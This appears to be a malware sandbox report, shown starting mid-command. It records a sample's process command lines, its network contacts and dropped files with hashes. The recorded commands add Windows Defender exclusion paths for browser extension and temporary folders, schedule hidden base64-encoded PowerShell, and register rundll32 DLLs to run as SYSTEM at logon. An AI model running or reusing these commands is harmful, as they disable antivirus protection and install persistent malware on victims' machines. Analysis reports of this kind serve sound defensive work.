/reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gMcnYgWbv" /SC once /ST 04:16:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gMcnYgWbv"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gMcnYgWbv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 13:59:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe\" XT /rBsite_idGuS 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe XT /rBsite_idGuS 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\ojTVpK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\WnleIRa.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qbSDwEgyNYPZlGA"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\LHvjJyj.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\DnXqKSf.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\FaYwZcq.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\OTNmBJT.xml" /RU "SYSTEM"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 04:13:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll\",#1 /Fosite_idXfG 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QhciBzJOokLnyYZub"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll",#1 /Fosite_idXfG 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll",#1 /Fosite_idXfG 385118
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe
"C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
C:\Windows\SYSTEM32\msiexec.exe
"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| RU | 77.221.151.32:80 | 77.221.151.32 | tcp |
| US | 8.8.8.8:53 | skategirls.org | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 104.26.8.202:443 | grabify.link | tcp |
| US | 172.67.193.79:443 | realdeepai.org | tcp |
| US | 172.67.193.79:443 | realdeepai.org | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 112.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| DE | 185.172.128.209:80 | 185.172.128.209 | tcp |
| GB | 85.192.56.26:80 | tcp | |
| DE | 185.172.128.228:80 | tcp | |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 82.145.216.16:443 | features.opera-api2.com | tcp |
| NL | 82.145.216.24:443 | download.opera.com | tcp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| GB | 2.16.27.215:443 | download3.operacdn.com | tcp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| CH | 172.217.210.127:19302 | stun4.l.google.com | udp |
| BG | 185.82.216.108:443 | server1.alldatadump.org | tcp |
| FR | 185.93.2.246:443 | download.iolo.net | tcp |
| US | 8.8.8.8:53 | 108.216.82.185.in-addr.arpa | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 71.221.67.172.in-addr.arpa | udp |
| BG | 185.82.216.108:443 | server1.alldatadump.org | tcp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.145:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 104.26.8.59:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 34.117.186.192:443 | tcp | |
| BG | 185.82.216.108:443 | server1.alldatadump.org | tcp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.101.63.23.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| GB | 172.217.16.225:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 44.239.141.158:80 | api4.check-data.xyz | tcp |
| BG | 185.82.216.108:443 | server1.alldatadump.org | tcp |
Files
memory/4960-0-0x000002890B300000-0x000002890B336000-memory.dmp
memory/4960-1-0x00007FFE2DAC0000-0x00007FFE2E582000-memory.dmp
memory/4960-2-0x000002890D100000-0x000002890D110000-memory.dmp
memory/4960-3-0x000002890D040000-0x000002890D09E000-memory.dmp
memory/4284-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/4284-5-0x0000000074E60000-0x0000000075611000-memory.dmp
memory/4284-6-0x00000000056B0000-0x00000000056C0000-memory.dmp
memory/4960-7-0x00007FFE2DAC0000-0x00007FFE2E582000-memory.dmp
C:\Users\Admin\Pictures\IxskVchc2rUcLuGjAA6X3uRx.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
| MD5 | 91a5c37b8ffaf4337e6a180b53cb3bc9 |
| SHA1 | f26e6a9a0469259358bf11d7520d97b1a1217d0d |
| SHA256 | 0a8a918a87480164a28ff60fb51ca3fc54afdf9ebce43343a8f2c05c2431ce46 |
| SHA512 | 6d968aca48c66fd2207308aeeb5dfd3e9eec4a523a8fa31259352eee359018772b41095b87453bea548b45c3f35fc22a2855ab11a1269705839fde3c8439c294 |
memory/3076-30-0x0000000001C70000-0x0000000001D70000-memory.dmp
memory/3076-31-0x0000000001BE0000-0x0000000001C52000-memory.dmp
memory/3076-32-0x0000000000400000-0x0000000001A40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
| MD5 | 513e1df3bd8755c988baf3f682d3abc0 |
| SHA1 | 909fa3f20c167213d94c6edc50bb43672d8cb41e |
| SHA256 | 9f8af4317529d2b35ddafa1b74a2379695cf0c68ef2639141fe0e875692b9e9d |
| SHA512 | c838f5520bbd320c53a7daa536eef16cc819abf509b973d570e93a7906c5dafa569e07a81c11b73637daf8ff8e03aa508ef0825f3e5a36c8d98b3764cadb4ba4 |
memory/3400-42-0x0000000001AC0000-0x0000000001BC0000-memory.dmp
memory/3400-43-0x0000000003720000-0x0000000003747000-memory.dmp
memory/3400-44-0x0000000000400000-0x0000000001A19000-memory.dmp
C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
| MD5 | 7ea234dfc011f40047e769b15ebe661b |
| SHA1 | 5a779733891b290d45b3009eb4ceb17c41a2401d |
| SHA256 | c7c0f3e7c270835c0af43a4103d9ef95f85f3ce48d7ab7863d1d3a2fae1847c8 |
| SHA512 | 71f90fcd6f1c72ab8e9498ff811982db7dd0aa28bb384e8642b3dd75db7b699d853725930eba629e7fa27449bd876a70c8be2619ebc09f514ae06cde714bc9fd |
memory/3044-56-0x0000000003B90000-0x0000000003F8E000-memory.dmp
memory/3044-57-0x0000000003F90000-0x000000000487B000-memory.dmp
memory/3400-58-0x0000000000400000-0x0000000001A19000-memory.dmp
memory/3044-59-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/3800-71-0x0000000003AE0000-0x0000000003EE7000-memory.dmp
memory/3800-72-0x0000000003FF0000-0x00000000048DB000-memory.dmp
memory/3800-73-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/4284-75-0x0000000074E60000-0x0000000075611000-memory.dmp
memory/1472-74-0x0000000002F70000-0x0000000002FA6000-memory.dmp
memory/3320-76-0x0000000005760000-0x0000000005D8A000-memory.dmp
memory/1472-77-0x0000000074E60000-0x0000000075611000-memory.dmp
memory/3320-79-0x0000000003090000-0x00000000030A0000-memory.dmp
memory/4284-81-0x00000000056B0000-0x00000000056C0000-memory.dmp
memory/1472-80-0x00000000034A0000-0x00000000034B0000-memory.dmp
memory/1472-78-0x00000000034A0000-0x00000000034B0000-memory.dmp
memory/3320-82-0x0000000005500000-0x0000000005522000-memory.dmp
memory/1472-83-0x0000000005A70000-0x0000000005AD6000-memory.dmp
memory/1472-84-0x0000000006260000-0x00000000062C6000-memory.dmp
memory/3076-85-0x0000000000400000-0x0000000001A40000-memory.dmp
memory/3320-94-0x0000000074E60000-0x0000000075611000-memory.dmp
memory/1472-104-0x00000000062D0000-0x0000000006627000-memory.dmp
memory/3320-103-0x0000000003090000-0x00000000030A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enkhxx5j.h4u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3320-105-0x00000000063A0000-0x00000000063BE000-memory.dmp
memory/1472-106-0x0000000006840000-0x000000000688C000-memory.dmp
memory/1472-107-0x0000000006D10000-0x0000000006D56000-memory.dmp
C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
| MD5 | 749cb9cb3ce89a03fdd97a9aaf96e895 |
| SHA1 | 73ecd478ace66e1dfb7aeed8ed061af48214a46f |
| SHA256 | 85aeb0eca144912f0713ac4e8392e2645a91bb4ba8e2ffa55e5bf834665170af |
| SHA512 | ac0afac898ab53a3277b4d1aef90af246ca8596872a6a61bbf47817c1ea038fc4394094a4d14d2cc0aa94aeaf1435f9ccc7cf7143010ff581fd4256dc653bd31 |
memory/3076-118-0x0000000001C70000-0x0000000001D70000-memory.dmp
memory/4544-119-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4544-120-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4544-122-0x00007FFE4E460000-0x00007FFE4E51D000-memory.dmp
memory/4544-121-0x00007FFE4E460000-0x00007FFE4E51D000-memory.dmp
memory/4544-125-0x00007FFE00030000-0x00007FFE00031000-memory.dmp
memory/4544-123-0x00007FFE4E960000-0x00007FFE4EB69000-memory.dmp
memory/4544-124-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4544-127-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4544-129-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/4544-128-0x00007FFE00000000-0x00007FFE00002000-memory.dmp
memory/3044-126-0x0000000003B90000-0x0000000003F8E000-memory.dmp
memory/4544-130-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/1472-131-0x0000000007BA0000-0x0000000007BD4000-memory.dmp
memory/1472-139-0x000000006FC20000-0x000000006FC6C000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/3320-141-0x000000006FC20000-0x000000006FC6C000-memory.dmp
memory/3320-151-0x000000006FC70000-0x000000006FFC7000-memory.dmp
memory/1472-153-0x000000007F7C0000-0x000000007F7D0000-memory.dmp
memory/1472-152-0x0000000007C00000-0x0000000007C1E000-memory.dmp
memory/1472-162-0x0000000007C20000-0x0000000007CC4000-memory.dmp
memory/3320-163-0x000000007FD40000-0x000000007FD50000-memory.dmp
memory/4544-142-0x0000000140000000-0x00000001408B7000-memory.dmp
memory/1472-164-0x00000000034A0000-0x00000000034B0000-memory.dmp
memory/1472-140-0x000000006FC70000-0x000000006FFC7000-memory.dmp
memory/3320-165-0x0000000007FB0000-0x000000000862A000-memory.dmp
memory/3320-166-0x0000000007970000-0x000000000798A000-memory.dmp
memory/3044-169-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/3320-170-0x00000000079B0000-0x00000000079BA000-memory.dmp
memory/3320-171-0x0000000007AC0000-0x0000000007B56000-memory.dmp
memory/1472-172-0x0000000007DD0000-0x0000000007DE1000-memory.dmp
memory/3320-173-0x0000000007A20000-0x0000000007A2E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | d0c46cad6c0778401e21910bd6b56b70 |
| SHA1 | 7be418951ea96326aca445b8dfe449b2bfa0dca6 |
| SHA256 | 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02 |
| SHA512 | 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | eab44ef09ff53b0b440726d9e99fe2b8 |
| SHA1 | b5b0bb8c080c91df8098a5befedd85714b3728c0 |
| SHA256 | bdc52185fcfe83799d64f12acda8ff4bb1e2271cf8ecd5566d317bf4ca381f35 |
| SHA512 | d8923b3f1edbdfcc7961f0b91d819a8759e76e66339393e8a57854bcf22e7c14947bdb5926abe98acfb1f82d53e75a6e8cdf559aeafb64f9a239a563856d7758 |
memory/3076-190-0x0000000000400000-0x0000000001A40000-memory.dmp
C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
| MD5 | aaa56797070369ad346fbd9bb6cc5e8b |
| SHA1 | a1d01943f0a354d3a000628262671254ca6a91b8 |
| SHA256 | 9d7d08ac35f0113f7c814d257bf88b8222975aaa0a3fdeda88ac7185dbc50905 |
| SHA512 | e69d25a158567c6bce6e9450de17d0814b9b9c11f4bb31e5dcc3e8b4378062cc7e31da625f6ba4a2280b393034a6c832a0fc0a1e16364dc7e8c8146de245b5be |
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
| MD5 | a1fd806ca74149c35531a1e3a2393d75 |
| SHA1 | 1dc87223d20652050b12da2f0a53f590ff51de4e |
| SHA256 | 1950956104ea0c283a5637d2e93f3e72567b76abb94b4a4b85886677bdbc63e2 |
| SHA512 | cede4de9aad1141d2d07dcde2dae24b8a37384fc086998de62f84f5a1360c8ce55e4dff98d8e72ae82f324651976f27a8c220cdc0a2dd7e32dc33d1f7cfe60e8 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_240419140451252724.dll
| MD5 | 0415cb7be0361a74a039d5f31e72fa65 |
| SHA1 | 46ae154436c8c059ee75cbc6a18ccda96bb2021d |
| SHA256 | bb38a8806705980ee3e9181c099e8d5c425e6c9505a88e5af538ca6a48951798 |
| SHA512 | f71c2b9e1559aa4eb2d72f852ef9807c781d4a7b96b8e0c2c53b895885319146bd43aa6e4223d43159f3d40bc60704206404dc034500e47fca0a94e53b60239e |
